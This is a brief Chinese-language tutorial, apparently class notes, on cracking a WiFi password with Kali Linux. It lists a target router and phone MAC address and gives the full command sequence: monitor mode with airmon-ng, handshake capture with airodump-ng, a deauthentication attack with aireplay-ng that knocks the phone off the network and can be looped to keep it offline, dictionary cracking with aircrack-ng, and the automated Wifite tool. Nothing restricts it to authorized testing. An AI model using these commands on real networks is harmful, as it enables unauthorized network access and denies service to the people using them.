路由器的
78:44:FD:49:79:80
手機的
14:9D:09:C9:E2:ED
一:環境準備
kali系統
密碼字典(先将密碼字典拷貝到kali系統中)
自己寫一個:裡面包含wifi的密碼
vim /root/mima.txt
aptech123
二:破解流程
1:連接配接無線網卡
2:檢視網卡狀态
Iwconfig
3:設定網卡為監聽模式
airmon-ng check kill
airmon-ng start wlan0
4:掃描無線網絡
airodump-ng wlan0
記錄下來你要破解的那個路由器的BSSID,以及該路由器目前連接配接的手機的資訊station
還要記錄下路由器使用的信号通道
如果掃描不到,可以重複掃描,掃描到可以ctrl+c取消掃描,記下兩個mac和信道
5:抓取握手包(不要停止):
airodump-ng -c 6 --ivs -w test --bssid 78:44:FD:49:79:80 wlan0
-c:路由器使用的信号通道
--ivs:将抓取到的包儲存為ivs的檔案格式
-w:指定儲存的握手包的名字
--bssid:指定抓取到的路由器的實體位址
wlan0:kali系統的無線網卡的名字
6:再打開另一個終端對手機終端進行反認證攻擊
給連接配接到wifi的一個裝置發送一個deauth(反認證)包,讓那個裝置斷開wifi,随後它自然會再次連接配接wifi。
aireplay-ng -0 10 -a 78:44:FD:49:79:80 -c 14:9D:09:C9:E2:ED wlan0
-0(零):沖突攻擊模式,後面跟發送次數(設定為0,則為循環攻擊,不停的斷開連接配接,用戶端無法正常上網
-a:指定路由器的實體位址
-c:指定手機的實體位址
wlan0mon:kali系統的無線網卡的名字
7:利用密碼字典破解密碼
aircrack-ng -w /root/mima.txt /root/test-01.ivs
Wifite工具
root@kali:~# wifite –help
root@kali:~# ifconfig wlan0 down
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ifconfig wlan0 up
root@kali:~# iwconfig
root@kali:~#wifite